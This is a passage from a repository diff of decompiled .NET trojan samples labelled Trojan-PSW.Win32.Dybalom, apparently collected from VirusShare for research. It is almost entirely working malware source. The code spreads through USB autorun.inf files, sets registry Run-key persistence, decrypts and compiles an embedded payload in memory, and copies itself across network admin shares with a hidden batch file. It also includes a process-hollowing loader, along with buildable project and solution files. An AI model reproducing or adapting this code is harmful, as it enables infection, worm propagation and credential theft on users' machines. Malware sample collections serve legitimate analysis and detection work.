fileInfo.Attributes = FileAttributes.Hidden;
label_6:
obj1 = (object) null;
goto label_13;
label_8:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_1;
case 2:
goto label_2;
case 3:
goto label_3;
case 4:
goto label_4;
case 5:
goto label_5;
case 6:
goto label_6;
case 7:
goto label_13;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_8;
}
throw ProjectData.CreateProjectError(-2146828237);
label_13:
object obj2 = obj1;
if (num2 == 0)
return obj2;
ProjectData.ClearProjectError();
return obj2;
}
public static object SetAutorun(string drive)
{
label_1:
int num1;
object obj1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = -2;
label_2:
int num3 = 2;
StreamWriter streamWriter = new StreamWriter(drive + "\\autorun.inf");
label_3:
num3 = 3;
streamWriter.WriteLine("[AutoRun]");
label_4:
num3 = 4;
streamWriter.WriteLine("Open = erPCyQY.exe");
label_5:
num3 = 5;
streamWriter.Close();
label_6:
num3 = 6;
FileInfo fileInfo = new FileInfo(drive + "\\autorun.inf");
label_7:
num3 = 7;
fileInfo.Attributes = FileAttributes.Hidden;
label_8:
obj1 = (object) null;
goto label_15;
label_10:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_1;
case 2:
goto label_2;
case 3:
goto label_3;
case 4:
goto label_4;
case 5:
goto label_5;
case 6:
goto label_6;
case 7:
goto label_7;
case 8:
goto label_8;
case 9:
goto label_15;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_10;
}
throw ProjectData.CreateProjectError(-2146828237);
label_15:
object obj2 = obj1;
if (num2 == 0)
return obj2;
ProjectData.ClearProjectError();
return obj2;
}
public static void searchDrives()
{
label_1:
int num1;
int num2;
try
{
label_2:
ProjectData.ClearProjectError();
num1 = -2;
label_3:
int num3 = 3;
Thread.Sleep(1000);
label_4:
num3 = 4;
DriveInfo[] drives = DriveInfo.GetDrives();
label_5:
num3 = 5;
DriveInfo[] driveInfoArray = drives;
int index = 0;
goto label_16;
label_7:
num3 = 6;
DriveInfo driveInfo;
if (driveInfo.DriveType != DriveType.Removable)
goto label_14;
label_8:
num3 = 7;
if (!driveInfo.IsReady)
goto label_13;
label_9:
num3 = 8;
if (System.IO.File.Exists(driveInfo.Name + "\\erPCyQY.exe"))
goto label_12;
label_10:
num3 = 9;
YUGFYLIGvlfiyl.Spread(driveInfo.Name);
label_11:
num3 = 10;
YUGFYLIGvlfiyl.SetAutorun(driveInfo.Name);
label_12:
label_13:
label_14:
++index;
label_15:
num3 = 14;
label_16:
if (index < driveInfoArray.Length)
{
driveInfo = driveInfoArray[index];
goto label_7;
}
else
goto label_2;
label_18:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_1;
case 2:
case 15:
goto label_2;
case 3:
goto label_3;
case 4:
goto label_4;
case 5:
goto label_5;
case 6:
goto label_7;
case 7:
goto label_8;
case 8:
goto label_9;
case 9:
goto label_10;
case 10:
goto label_11;
case 11:
goto label_12;
case 12:
goto label_13;
case 13:
goto label_14;
case 14:
goto label_15;
case 16:
goto label_23;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_18;
}
throw ProjectData.CreateProjectError(-2146828237);
label_23:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
[STAThread]
public static void Main()
{
ResourceManager resourceManager = new ResourceManager("H", Assembly.GetExecutingAssembly());
string Expression = Conversions.ToString(resourceManager.GetObject("K4T8F6c"));
FHQnUxOuBUcRwss fhQnUxOuBucRwss = new FHQnUxOuBUcRwss(Conversions.ToString(resourceManager.GetObject("N1HXjA")));
string[] strArray = Strings.Split(Expression, "SuZz5vnl5M1s6Sra");
string Right = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("śƕšŽ´", "So8dxq7eL5m3PMUH");
string str1 = Conversions.ToString(Operators.ConcatenateObject((object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\"), Operators.AddObject(resourceManager.GetObject("WggM2"), (object) ".exe")));
try
{
Process process = (Process) null;
Process[] processes = Process.GetProcesses();
int index = 0;
if (index < processes.Length)
goto label_6;
else
goto label_7;
label_3:
if (System.IO.File.Exists(str1))
{
System.IO.File.Delete(str1);
goto label_9;
}
else
goto label_9;
label_6:
process = processes[index];
if (!str1.Contains(process.ProcessName))
goto label_3;
label_7:
process.Kill();
goto label_3;
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
label_9:
try
{
MyProject.Computer.FileSystem.WriteAllBytes(str1, fhQnUxOuBucRwss.DbqjTCEYBFTdyMy(Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("UntJ0")))), false);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
YUGFYLIGvlfiyl.kXKlIGiQhTXwXic("MonAMour", "R", YUGFYLIGvlfiyl.CC(Conversions.ToString(resourceManager.GetObject("nerdz"))), new object[2]
{
(object) fhQnUxOuBucRwss.DbqjTCEYBFTdyMy(Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("tZAsD")))),
(object) str1
});
new Thread(new ThreadStart(YUGFYLIGvlfiyl.CiMbIOhpfLGHFKu)).Start();
try
{
object environmentVariable = (object) Environment.GetEnvironmentVariable("temp");
Registry.CurrentUser.OpenSubKey(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŚŧŴŮƗƆƌƀŗŧƑŝƙśƝźŭŬŪőƉƓžƊŲƍƄĽƜŞƜŰŵŬŤşƒƘƃƊũŶźůƕ´", "SDZFlqfgGftFs8vW")).SetValue("Win32", Operators.ConcatenateObject(environmentVariable, (object) "\\erPCyQY.exe"));
System.IO.File.Copy(Application.ExecutablePath, Conversions.ToString(Operators.ConcatenateObject(environmentVariable, (object) "\\erPCyQY.exe")));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
System.IO.File.Copy(Application.ExecutablePath, Conversions.ToString(Operators.ConcatenateObject((object) Environment.GetFolderPath(Environment.SpecialFolder.Startup), (object) "\\erPCyQY.exe")));
ProjectData.ClearProjectError();
}
YUGFYLIGvlfiyl.searchDrives();
string str2 = MyProject.Computer.FileSystem.SpecialDirectories.CurrentUserApplicationData + YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ţƙŲŮūƐſƌŖĶƒŴţ´", "SnULKmdi4TyHJsgC");
try
{
Dns.GetHostAddresses(Dns.GetHostName())[0].ToString();
Dns.GetHostEntry(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("žŜŝŹŞŴƋƐŭ´", "S97ZCNhgI8QfVduK"));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
System.IO.File.Copy(Application.ExecutablePath, YUGFYLIGvlfiyl.HqBHDPguDENkfJL("žŜŝŹŞŴƋƐŭ´", "S97ZCNhgI8QfVduK"));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
object Instance = (object) new StreamWriter("C:\\LcvHEwb.bat");
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŇŪŇŶƒĥŚƊƐĝłħƄƙŒžŲĥœŴƉ´", "SQ0ZoQ7pvIhSns9i")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) "net view >log.txt"
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŭƑųōīşĘłĬšļƇƄŁŏƕŶƉįơŴŭġĽūŜļņĶ´", "SnMyHEDiS9hjbmsu")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\IPC$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\ADMIN$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\C$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\D$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\PRINT$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\e$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\e$\\shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\d$\\shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\C$\\shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ")"
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "Close", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null, true);
new Process()
{
StartInfo = {
WindowStyle = ProcessWindowStyle.Hidden,
FileName = "C:\\LcvHEwb.bat"
}
}.Start();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (Operators.CompareString(strArray[2], Right, false) != 0)
;
if (Operators.CompareString(strArray[4], Right, false) != 0)
;
}
private static bool kXKlIGiQhTXwXic(
string Class,
string Void,
Assembly file,
object[] Parameters)
{
bool boolean;
try
{
System.Type type = file.GetType(Class);
if ((object) type != null)
{
MethodInfo method = type.GetMethod(Void);
if ((object) method != null)
{
boolean = Conversions.ToBoolean(method.Invoke((object) null, Parameters));
goto label_6;
}
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
label_6:
return boolean;
}
public static Assembly CC(string Source)
{
YUGFYLIGvlfiyl.urPkJBxJaoKxHfa = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("űƖŵƦƶǀÛ", "Sh2jiulGpHtnnVzW");
YUGFYLIGvlfiyl.DFlGLTJoxxwCYfm = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ƁƾǃƂƩƱŏƬơƺÛ", "Sju3iiFmZsEiQdJe");
YUGFYLIGvlfiyl.RedtwzrQfYIqsNp = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ƁƜƜƜƔǁĺƀųƞƣƆŵƮƍƍƢőƍƔƛÛ", "SHNMTy1X7UgD5fMD");
YUGFYLIGvlfiyl.uIFnBaaCKWySxWn = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ĐńŔŒņĬŲũŐğųĞĬ\u008E", "SFZcD8uiUWmXhX8w");
CompilerParameters options = new CompilerParameters();
CodeDomProvider provider = CodeDomProvider.CreateProvider(YUGFYLIGvlfiyl.urPkJBxJaoKxHfa);
options.GenerateExecutable = false;
options.GenerateInMemory = true;
options.ReferencedAssemblies.Add(YUGFYLIGvlfiyl.DFlGLTJoxxwCYfm);
options.ReferencedAssemblies.Add(YUGFYLIGvlfiyl.RedtwzrQfYIqsNp);
options.CompilerOptions = YUGFYLIGvlfiyl.uIFnBaaCKWySxWn;
options.TreatWarningsAsErrors = false;
return provider.CompileAssemblyFromSource(options, Source).CompiledAssembly;
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-7165c430e65007ba4e06c1102bd27284e72058e532c0cd42c4816a0da52139f3/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-7165c430e65007ba4e06c1102bd27284e72058e532c0cd42c4816a0da52139f3/IX.cs
+127
View File
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: sxqoj64a, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 85FE03F2-BE0C-43D8-AE8D-69F7178EA945
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-7165c430e65007ba4e06c1102bd27284e72058e532c0cd42c4816a0da52139f3.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-7165c430e65007ba4e06c1102bd27284e72058e532c0cd42c4816a0da52139f3/Trojan-PSW.Win32.Dybalom.gwl.csproj
+36
View File
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-7165c430e65007ba4e06c1102bd27284e72058e532c0cd42c4816a0da52139f3.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{9014BB17-A2A2-4D48-B5F2-9010CADAB73E}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>sxqoj64a</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-7165c430e65007ba4e06c1102bd27284e72058e532c0cd42c4816a0da52139f3/Trojan-PSW.Win32.Dybalom.gwl.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "sxqoj64a", "Trojan-PSW.Win32.Dybalom.gwl-7165c430e65007ba4e06c1102bd27284e72058e532c0cd42c4816a0da52139f3.csproj", "{9014BB17-A2A2-4D48-B5F2-9010CADAB73E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{9014BB17-A2A2-4D48-B5F2-9010CADAB73E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{9014BB17-A2A2-4D48-B5F2-9010CADAB73E}.Debug|Any CPU.Build.0 = Debug|Any CPU
{9014BB17-A2A2-4D48-B5F2-9010CADAB73E}.Release|Any CPU.ActiveCfg = Release|Any CPU
{9014BB17-A2A2-4D48-B5F2-9010CADAB73E}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-99c82de7142b8ce914328b78596a24c420eefa8ab19291d81db74a0b70ddd606/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-99c82de7142b8ce914328b78596a24c420eefa8ab19291d81db74a0b70ddd606/IX.cs
+127
View File
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: lmyuayzw, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C7DC3372-01FA-4B26-9802-388A7CD3ED9E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-99c82de7142b8ce914328b78596a24c420eefa8ab19291d81db74a0b70ddd606.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-99c82de7142b8ce914328b78596a24c420eefa8ab19291d81db74a0b70ddd606/Trojan-PSW.Win32.Dybalom.gwl.csproj
+36
View File
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-99c82de7142b8ce914328b78596a24c420eefa8ab19291d81db74a0b70ddd606.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{2D830FDA-57D4-43FA-93AB-94E19D8CEDA3}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>lmyuayzw</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-99c82de7142b8ce914328b78596a24c420eefa8ab19291d81db74a0b70ddd606/Trojan-PSW.Win32.Dybalom.gwl.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "lmyuayzw", "Trojan-PSW.Win32.Dybalom.gwl-99c82de7142b8ce914328b78596a24c420eefa8ab19291d81db74a0b70ddd606.csproj", "{2D830FDA-57D4-43FA-93AB-94E19D8CEDA3}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{2D830FDA-57D4-43FA-93AB-94E19D8CEDA3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{2D830FDA-57D4-43FA-93AB-94E19D8CEDA3}.Debug|Any CPU.Build.0 = Debug|Any CPU
{2D830FDA-57D4-43FA-93AB-94E19D8CEDA3}.Release|Any CPU.ActiveCfg = Release|Any CPU
{2D830FDA-57D4-43FA-93AB-94E19D8CEDA3}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
